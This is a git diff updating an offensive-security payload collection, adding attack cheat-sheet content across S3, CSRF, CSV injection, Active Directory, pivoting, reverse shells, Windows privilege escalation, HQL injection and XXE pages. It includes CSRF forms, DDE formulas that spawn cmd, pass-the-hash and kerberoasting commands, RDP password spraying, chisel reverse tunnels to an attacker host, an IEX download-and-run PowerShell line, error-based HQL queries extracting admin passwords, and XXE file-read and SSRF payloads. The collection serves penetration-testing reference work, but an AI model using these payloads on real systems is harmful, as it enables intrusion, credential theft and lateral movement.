diff --git a/AWS Amazon Bucket S3/README.md b/AWS Amazon Bucket S3/README.md
index 1022175..8b7b51b 100644
--- a/AWS Amazon Bucket S3/README.md	
+++ b/AWS Amazon Bucket S3/README.md	
@@ -192,3 +192,5 @@ For example with a proxy : http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws
 * [flaws.cloud Challenge based on AWS vulnerabilities - by Scott Piper of Summit Route](http://flaws.cloud/)
 * [flaws2.cloud Challenge based on AWS vulnerabilities - by Scott Piper of Summit Route](http://flaws2.cloud)
 * [Guardzilla video camera hardcoded AWS credential - 0dayallday.org](https://www.0dayallday.org/guardzilla-video-camera-hard-coded-aws-credentials/)
+* [AWS PENETRATION TESTING PART 1. S3 BUCKETS - VirtueSecurity](https://www.virtuesecurity.com/aws-penetration-testing-part-1-s3-buckets/)
+* [AWS PENETRATION TESTING PART 2. S3, IAM, EC2 - VirtueSecurity](https://www.virtuesecurity.com/aws-penetration-testing-part-2-s3-iam-ec2/)
\ No newline at end of file
diff --git a/CSRF Injection/README.md b/CSRF Injection/README.md
index 7deed48..01a39fe 100644
--- a/CSRF Injection/README.md	
+++ b/CSRF Injection/README.md	
@@ -7,6 +7,17 @@
 
 * [Methodology](#methodology)
 * [Payloads](#payloads)
+    * [HTML GET - Requiring User Interaction](#)
+    * [HTML GET - No User Interaction)](#)
+    * [HTML POST - Requiring User Interaction](#)
+    * [HTML POST - AutoSubmit - No User Interaction](#)
+    * [JSON GET - Simple Request](#)
+    * [JSON POST - Simple Request](#)
+    * [JSON POST - Complex Request](#)
+
+## Tools
+
+* [XSRFProbe - The Prime Cross Site Request Forgery Audit and Exploitation Toolkit.](https://github.com/0xInfection/XSRFProbe)
 
 ## Methodology
 
@@ -16,19 +27,19 @@
 
 When you are logged in to a certain site, you typically have a session. The identifier of that session is stored in a cookie in your browser, and is sent with every request to that site. Even if some other site triggers a request, the cookie is sent along with the request and the request is handled as if the logged in user performed it.
 
-### HTML GET – Requiring User Interaction for Proof-of-Concept
+### HTML GET - Requiring User Interaction
 
 ```html
 <a href="http://www.example.com/api/setusername?username=CSRFd">Click Me</a>
 ```
 
-### HTML GET (No User Interaction)
+### HTML GET - No User Interaction
 
 ```html
 <img src="http://www.example.com/api/setusername?username=CSRFd">
 ```
 
-### HTML POST – Requiring User Interaction for Proof-of-Concept
+### HTML POST - Requiring User Interaction
 
 ```html
 <form action="http://www.example.com/api/setusername" enctype="text/plain" method="POST">
@@ -37,7 +48,7 @@ When you are logged in to a certain site, you typically have a session. The iden
 </form>
 ```
 
-### HTML POST (AutoSubmit – No User Interaction)
+### HTML POST - AutoSubmit - No User Interaction
 
 ```html
 <form id="autosubmit" action="http://www.example.com/api/setusername" enctype="text/plain" method="POST">
@@ -51,7 +62,7 @@ When you are logged in to a certain site, you typically have a session. The iden
 ```
 
 
-### JSON GET – Simple Request
+### JSON GET - Simple Request
 
 ```html
 <script>
@@ -61,7 +72,7 @@ xhr.send();
 </script>
 ```
 
-### JSON POST – Simple Request
+### JSON POST - Simple Request
 
 ```html
 <script>
@@ -76,7 +87,7 @@ xhr.send('{"role":admin}');
 </script>
 ```
 
-### JSON POST – Complex Request
+### JSON POST - Complex Request
 
 ```html
 <script>
@@ -102,4 +113,5 @@ xhr.send('{"role":admin}');
 - [FORM POST JSON: JSON CSRF on POST Heartbeats API - Dr.Jones](https://hackerone.com/reports/245346)
 - [Hacking Facebook accounts using CSRF in Oculus-Facebook integration](https://www.josipfranjkovic.com/blog/hacking-facebook-oculus-integration-csrf)
 - [Cross site request forgery (CSRF) - Sjoerd Langkemper - Jan 9, 2019](http://www.sjoerdlangkemper.nl/2019/01/09/csrf/)
-- [Cross-Site Request Forgery Attack - PwnFunction](https://www.youtube.com/watch?v=eWEgUcHPle0)
\ No newline at end of file
+- [Cross-Site Request Forgery Attack - PwnFunction](https://www.youtube.com/watch?v=eWEgUcHPle0)
+- [Wiping Out CSRF - Joe Rozner - Oct 17, 2017](#https://medium.com/@jrozner/wiping-out-csrf-ded97ae7e83f)
\ No newline at end of file
diff --git a/CSV Injection/README.md b/CSV Injection/README.md
index 5261b09..8a20586 100644
--- a/CSV Injection/README.md	
+++ b/CSV Injection/README.md	
@@ -10,6 +10,7 @@ Basic exploit with Dynamic Data Exchange
 # pop a calc
 DDE ("cmd";"/C calc";"!A0")A0
 @SUM(1+1)*cmd|' /C calc'!A0
+=2+5+cmd|' /C calc'!A0
 
 # pop a notepad
 =cmd|' /C notepad'!'A1'
@@ -42,4 +43,6 @@ Any formula can be started with
 * [Google Bug Hunter University - CSV Excel formula injection](https://sites.google.com/site/bughunteruniversity/nonvuln/csv-excel-formula-injection)
 * [Comma Separated Vulnerabilities - James Kettle](https://www.contextis.com/resources/blog/comma-separated-vulnerabilities/)
 * [CSV INJECTION: BASIC TO EXPLOIT!!!! - 30/11/2017 - Akansha Kesharwani](https://payatu.com/csv-injection-basic-to-exploit/)
-* [From CSV to Meterpreter - 5th November 2015 - Adam Chester](https://blog.xpnsec.com/from-csv-to-meterpreter/)
\ No newline at end of file
+* [From CSV to Meterpreter - 5th November 2015 - Adam Chester](https://blog.xpnsec.com/from-csv-to-meterpreter/)
+* [CSV Injection -> Meterpreter on Pornhub - @ZephrFish Andy](https://news.webamooz.com/wp-content/uploads/bot/offsecmag/147.pdf)
+* [The Absurdly Underestimated Dangers of CSV Injection - 7 October, 2017 - George Mauer](http://georgemauer.net/2017/10/07/csv-injection.html)
\ No newline at end of file
diff --git a/File Inclusion/README.md b/File Inclusion/README.md
index 25cd148..924241b 100644
--- a/File Inclusion/README.md	
+++ b/File Inclusion/README.md	
@@ -32,6 +32,7 @@
 ## Tools
 
 * [Kadimus - https://github.com/P0cL4bs/Kadimus](https://github.com/P0cL4bs/Kadimus)
+* [LFISuite - https://github.com/D35m0nd142/LFISuite](https://github.com/D35m0nd142/LFISuite)
 
 ## Basic LFI
 
diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md
index d047367..3eb8800 100644
--- a/Methodology and Resources/Active Directory Attack.md	
+++ b/Methodology and Resources/Active Directory Attack.md	
@@ -124,6 +124,7 @@ or
 
 ```powershell
 pth-smbclient -U "AD/ADMINISTRATOR%aad3b435b51404eeaad3b435b51404ee:2[...]A" //192.168.10.100/Share
+pth-smbclient -U "AD/ADMINISTRATOR%aad3b435b51404eeaad3b435b51404ee:2[...]A" //192.168.10.100/C$
 ls  # list files
 cd  # move inside a folder
 get # download files
@@ -409,6 +410,12 @@ active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=
 $krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$424338c0a3c3af43c360c29c154b012c$c54c7be163ae6c323ae6b5fc45a1eacee2f4903deec785cd689f4551e023775c7e7772fe85e3fb8374ca95534d72c971ba80e8b6d4ef3c3b8439dc54031540133cbcbd5f7b39d622733d198eec594c0cd181ab4696a6ad12744d1ddd2d3e2c6dd33b4daedbc9cae75e8ff2652c80421b0fa3a61ddf2cabeea462c44e0f6d9a6436717e0621bb4e0fe8bd3cf36156b4b2f7b81d651f70baf34a0b3071858b5034b895c25a0d3c67044c849d5952c381a0078a86ae562810a93d9c7bcc8311255cc9eda35a9c4d4d43ff1cc29108056285c954f3c633332ff0cb0c9c0f1896c792b247c8d25f5dd71802728fc99bb22709337b5596ab0e2045110b0b005b03351e9f71a65b48e8259f6191ce95d4e5794846c61c3abccf0f5f72a8679fb0dc0777720f5551ad99c9c9ab0955f85ee211d40b01fcaece7868960b2063923aa0f59e17b347f3308087707e95cad54b9df8179728821cf54cb204c5c2e571d9a66c8ec40b090305aa32e90a90d25ea37be6d8f8a83c683a8b69d386f9edb970596bc56fa02971f69c7e073b8de1213d9caa75ab652e5c5b99cadace9dd7d15d1d530309ea39ca1b7c6009ae3342796a6bdea084622ee95cbade437659e37363b848bad2186e3a9f7dec66e1e496db32d55eda8fb926f057996638646dcc662ed226788ddf36304dc70eaca91b26cb7180341f417fad91117ee10212c69423abd42769cbf891b51d736ffe474899eec8df64abef319d3c6dc379f2bfda33de7c3a1a50d6ece564d4559c77f560b7506fa2f1c9af7162f1247ea35706aafffde48b8cc48b1ec8e99d99ac81dc02f55f43f9726d746383cd076e7199070ff8100846ba9dc2235e92d0c7dac1f33da5fe7901e02f0566030d7c7e02535d6a300292a04e6c32d0d74d37679c2617750f5920d9c697a30c883519bc6b5a916eec354459c7f248c783bd79c436a7e8c463a8981a9e000d21c2d00c7e8468cff0ab695cb3aa4f14f149d1fafb4d656bcd1f67b747fc4c2d648466a386774853db8d50c22df57e747085142f98f5f06191c243b9dbf671da64228364f058c7e2e53a80fdde7f6dc2f25459a09fb2583757953247c222d64f49bc12d461d2e5aa572ceba2605d7eafd6031405ee422ac35cbf041b4fd28e58d871406e053d1a806de49056791646c175bf0d2aaa19f844bfc885520e19c391702be6ae61122fceac32b689764334908a4eaf7c69974a9519ebb068a15c087955fb402416bd184fd2
 ```
 
+Alternatively with [Rubeus](https://github.com/GhostPack/Rubeus)
+
+```powershell
+.\rubeus.exe kerberoast /creduser:DOMAIN\JOHN /credpassword:MyP@ssW0RD
+```
+
 Then crack the ticket with hashcat or john
 
 ```powershell
@@ -587,6 +594,12 @@ Using `crackmapexec` and `mp64` to generate passwords and spray them against SMB
 crackmapexec smb 10.0.0.1/24 -u Administrator -p `(./mp64.bin Pass@wor?l?a)`
 ```
 
+Using [RDPassSpray](https://github.com/xFreed0m/RDPassSpray) to target RDP services.
+
+```powershell
+python3 RDPassSpray.py -u [USERNAME] -p [PASSWORD] -d [DOMAIN] -t [TARGET IP]
+```
+
 Most of the time the best passwords to spray are :
 
 - Password1
diff --git a/Methodology and Resources/Network Pivoting Techniques.md b/Methodology and Resources/Network Pivoting Techniques.md
index 9ef65ac..a1be0ec 100644
--- a/Methodology and Resources/Network Pivoting Techniques.md	
+++ b/Methodology and Resources/Network Pivoting Techniques.md	
@@ -11,6 +11,7 @@
 * [Web SOCKS - reGeorg](#web-socks---regeorg)
 * [Metasploit](#metasploit)
 * [sshuttle](#sshuttle)
+* [chisel](#chisel)
 * [Rpivot](#rpivot)
 * [plink](#plink)
 * [ngrok](#ngrok)
@@ -142,6 +143,17 @@ sshuttle -vvr user@10.10.10.10 10.1.1.0/24
 sshuttle -vvr username@pivot_host 10.2.2.0/24 
 ```
 
+## chisel
+
+
+```powershell
+go get -v github.com/jpillora/chisel
+
+# forward port 389 and 88 to hacker computer
+user@victim$ .\chisel.exe client YOUR_IP:8008 R:88:127.0.0.1:88 R:389:localhost:389 
+user@hacker$ /opt/chisel/chisel server -p 8008 --reverse
+```
+
 ## Rpivot
 
 Server (Attacker box)
diff --git a/Methodology and Resources/Reverse Shell Cheatsheet.md b/Methodology and Resources/Reverse Shell Cheatsheet.md
index 41e0926..368f68a 100644
--- a/Methodology and Resources/Reverse Shell Cheatsheet.md	
+++ b/Methodology and Resources/Reverse Shell Cheatsheet.md	
@@ -280,7 +280,13 @@ $ msfvenom -p php/meterpreter_reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f raw
 
 ## Spawn TTY Shell
 
-Access shortcuts, su, nano and autocomplete in a partially tty shell
+In order to catch a shell, you need to listen on the desired port. `rlwrap` will enhance the shell, allowing you to clear the screen with `[CTRL] + [L]`.
+
+```powershell
+rlwrap nc localhost 80
+```
+
+Sometimes, you want to access shortcuts, su, nano and autocomplete in a partially tty shell.
 
 :warning: OhMyZSH might break this trick, a simple `sh` is recommended
 
@@ -321,6 +327,7 @@ lua: os.execute('/bin/sh')
 ```
 
 
+
 ## References
 
 * [Reverse Bash Shell One Liner](https://security.stackexchange.com/questions/166643/reverse-bash-shell-one-liner)
diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md
index e4f97a5..5c3cfde 100644
--- a/Methodology and Resources/Windows - Privilege Escalation.md	
+++ b/Methodology and Resources/Windows - Privilege Escalation.md	
@@ -36,8 +36,13 @@
     ```
 - [windows-privesc-check - Standalone Executable to Check for Simple Privilege Escalation Vectors on Windows Systems](https://github.com/pentestmonkey/windows-privesc-check)
 - [WindowsExploits - Windows exploits, mostly precompiled. Not being updated.](https://github.com/abatchy17/WindowsExploits)
-- [WindowsEnumv - A Powershell Privilege Escalation Enumeration Script.](https://github.com/absolomb/WindowsEnum)
+- [WindowsEnum - A Powershell Privilege Escalation Enumeration Script.](https://github.com/absolomb/WindowsEnum)
+- [Seatbelt - A C# project that performs a number of security oriented host-survey "safety checks" relevant from both offensive and defensive security perspectives.](https://github.com/GhostPack/Seatbelt)
 - [Powerless - Windows privilege escalation (enumeration) script designed with OSCP labs (legacy Windows) in mind](https://github.com/M4ximuss/Powerless)
+- [JAWS - Just Another Windows (Enum) Script](https://github.com/411Hall/JAWS)
+    ```powershell
+    powershell.exe -ExecutionPolicy Bypass -File .\jaws-enum.ps1 -OutputFilename JAWS-Enum.txt
+    ```
 - [PowerSploit's PowerUp](https://github.com/PowerShellMafia/PowerSploit)
     ```powershell
     powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks
diff --git a/SQL Injection/HQL Injection.md b/SQL Injection/HQL Injection.md
new file mode 100644
index 0000000..73e7e1d
--- /dev/null
+++ b/SQL Injection/HQL Injection.md	
@@ -0,0 +1,51 @@
+# Hibernate Query Language Injection 
+
+> Hibernate ORM (Hibernate in short) is an object-relational mapping tool for the Java programming language. It provides a framework for mapping an object-oriented domain model to a relational database. - Wikipedia
+
+## HQL Comments
+
+```sql
+HQL does not support comments
+```
+
+## HQL List Columns
+
+```sql
+from BlogPosts
+where title like '%'
+  and DOESNT_EXIST=1 and ''='%' -- 
+  and published = true
+```
+
+Using an unexisting column will an exception leaking several columns names.
+
+```sql
+org.hibernate.exception.SQLGrammarException: Column "DOESNT_EXIST" not found; SQL statement:
+      select blogposts0_.id as id21_, blogposts0_.author as author21_, blogposts0_.promoCode as promo3_21_, blogposts0_.title as title21_, blogposts0_.published as published21_ from BlogPosts blogposts0_ where blogposts0_.title like '%' or DOESNT_EXIST='%' and blogposts0_.published=1 [42122-159]
+```
+
+## HQL Error Based
+
+```sql
+from BlogPosts
+where title like '%11'
+  and (select password from User where username='admin')=1
+  or ''='%'
+  and published = true
+```
+
+Error based on value casting.
+
+```sql
+Data conversion error converting "d41d8cd98f00b204e9800998ecf8427e"; SQL statement:
+select blogposts0_.id as id18_, blogposts0_.author as author18_, blogposts0_.promotionCode as promotio3_18_, blogposts0_.title as title18_, blogposts0_.visible as visible18_ from BlogPosts blogposts0_ where blogposts0_.title like '%11' and (select user1_.password from User user1_ where user1_.username = 'admin')=1 or ''='%' and blogposts0_.published=1
+```
+
+:warning: **HQL does not support UNION queries**
+
+## References
+
+* [HQL for pentesters - February 12, 2014 - Philippe Arteau](https://blog.h3xstream.com/2014/02/hql-for-pentesters.html)
+* [How to put a comment into HQL (Hibernate Query Language)? - Thomas Bratt](https://stackoverflow.com/questions/3196975/how-to-put-a-comment-into-hql-hibernate-query-language)
+* [HQL : Hyperinsane Query Language - 04/06/2015 - Renaud Dubourguais](https://www.synacktiv.com/ressources/hql2sql_sstic_2015_en.pdf)
+* [ORM2Pwn: Exploiting injections in Hibernate ORM - Nov 26, 2015 - Mikhail Egorov](https://www.slideshare.net/0ang3el/orm2pwn-exploiting-injections-in-hibernate-orm)
\ No newline at end of file
diff --git a/Upload Insecure Files/README.md b/Upload Insecure Files/README.md
index c9382fe..e0e7bb0 100644
--- a/Upload Insecure Files/README.md	
+++ b/Upload Insecure Files/README.md	
@@ -86,3 +86,4 @@ Touch command
 * [BookFresh Tricky File Upload Bypass to RCE, NOV 29, 2014 - AHMED ABOUL-ELA](https://secgeek.net/bookfresh-vulnerability/)
 * [Encoding Web Shells in PNG IDAT chunks, 04-06-2012, phil](https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/)
 * [La PNG qui se prenait pour du PHP, 23 février 2014](https://phil242.wordpress.com/2014/02/23/la-png-qui-se-prenait-pour-du-php/)
+* [File Upload restrictions bypass - Haboob Team](https://www.exploit-db.com/docs/english/45074-file-upload-restrictions-bypass.pdf)
\ No newline at end of file
diff --git a/XXE Injection/README.md b/XXE Injection/README.md
index 9db48ac..f94edd0 100644
--- a/XXE Injection/README.md	
+++ b/XXE Injection/README.md	
@@ -11,12 +11,20 @@ Syntax: `<!ENTITY entity_name SYSTEM "entity_value">`
 ## Summary
 
 - [Tools](#tools)
-- [Exploit](#exploit)
-- [Basic XXE](#basic-xxe)
+- [Detect the vulnerability](#detect-the-vulnerability)
+- [Read file content](#read-file-content)
 - [PHP Wrapper inside XXE](#php-wrapper-inside-xxe)
+- [XXE to SSRF](#xxe-to-ssrf)
 - [Deny of service](#deny-of-service)
 - [Blind XXE - Out of Band](#blind-xxe---out-of-Band)
+  - [Blind XXE](#blind-xxe)
+  - [XXE OOB Attack (Yunusov, 2013)](#xxe-oob-attack-yusonov---2013)
+  - [XXE OOB with DTD and PHP filter](#xxe-oob-with-dtd-and-php-filter)
+  - [XXE OOB with Apache Karaf](#xxe-oob-with-apache-karaf)
 - [XXE in exotic files](#xxe-in-exotic-files)
+  - [XXE inside SVG](#xxe-inside-svg)
+  - [XXE inside SOAP](#xxe-inside-soap)
+  - [XXE inside DOCX file](#xxe-inside-docx-file)
 
 ## Tools
 
@@ -25,7 +33,7 @@ Syntax: `<!ENTITY entity_name SYSTEM "entity_value">`
   sudo ./xxeftp -uno 443 ./xxeftp -w -wps 5555
   ```
 
-## Exploit
+## Detect the vulnerability
 
 Basic entity test, when the XML parser parses the external entities the result should contain "John" in `firstName` and "Doe" in `lastName`. Entities are defined inside the `DOCTYPE` element.
 
@@ -40,7 +48,7 @@ Basic entity test, when the XML parser parses the external entities the result s
 
 It might help to set the `Content-Type: application/xml` in the request when sending XML payload to the server.
 
-## Basic XXE
+## Read file content
 
 Classic XXE, we try to display the content of the file `/etc/passwd` 
 
@@ -71,6 +79,16 @@ Classic XXE, we try to display the content of the file `/etc/passwd`
   <!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]><foo>&xxe;</foo>
 ```
 
+:warning: `SYSTEM` and `PUBLIC` are almost synonym.
+
+```xml
+<?xml version="1.0" encoding="ISO-8859-1"?>
+<!DOCTYPE foo [  
+  <!ELEMENT foo ANY >
+  <!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]><foo>&xxe;</foo>
+```
+
+
 Classic XXE Base64 encoded
 
 ```xml
@@ -101,9 +119,23 @@ Classic XXE Base64 encoded
 <foo>&xxe;</foo>
 ```
 
+## XXE to SSRF
+
+XXE can be combined with the [SSRF vulnerability](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery) to target another service on the network.
+
+```xml
+<?xml version="1.0" encoding="ISO-8859-1"?>
+<!DOCTYPE foo [
+<!ELEMENT foo ANY >
+<!ENTITY % xxe SYSTEM "http://secret.dev.company.com/secret_pass.txt" >
+]>
+<foo>&xxe;</foo>
+```
+
+
 ## Deny of service
 
-**Warning** : These attacks might kill the service or the server, do not use them on the production.
+:warning: : These attacks might kill the service or the server, do not use them on the production.
 
 Billion Laugh Attack
 
@@ -192,9 +224,9 @@ File stored on http://127.0.0.1/dtd.xml
 <!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://127.0.0.1/dtd.xml?%data;'>">
 ```
 
-### XXE OOB with Apache Karaf "hot deploy" (CVE-2018-11788)
+### XXE OOB with Apache Karaf
 
-Affected versions:
+CVE-2018-11788 affecting versions:
 
 - Apache Karaf <= 4.2.1
 - Apache Karaf <= 4.1.6
@@ -216,7 +248,8 @@ Ref. [brianwrf/CVE-2018-11788](https://github.com/brianwrf/CVE-2018-11788)
 ## XXE in exotic files
 
 ### XXE inside SVG
-```
+
+```xml
 <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="300" version="1.1" height="200">
     <image xlink:href="expect://ls"></image>
 </svg>
@@ -273,3 +306,4 @@ GIF (experimental)
 * [XXE in Uber to read local files](https://httpsonly.blogspot.hk/2017/01/0day-writeup-xxe-in-ubercom.html)
 * [XXE by SVG in community.lithium.com](http://esoln.net/Research/2017/03/30/xxe-in-lithium-community-platform/)
 * [XXE inside SVG](https://quanyang.github.io/x-ctf-finals-2016-john-slick-web-25/)
+* [Pentest XXE - @phonexicum](https://phonexicum.github.io/infosec/xxe.html)
\ No newline at end of file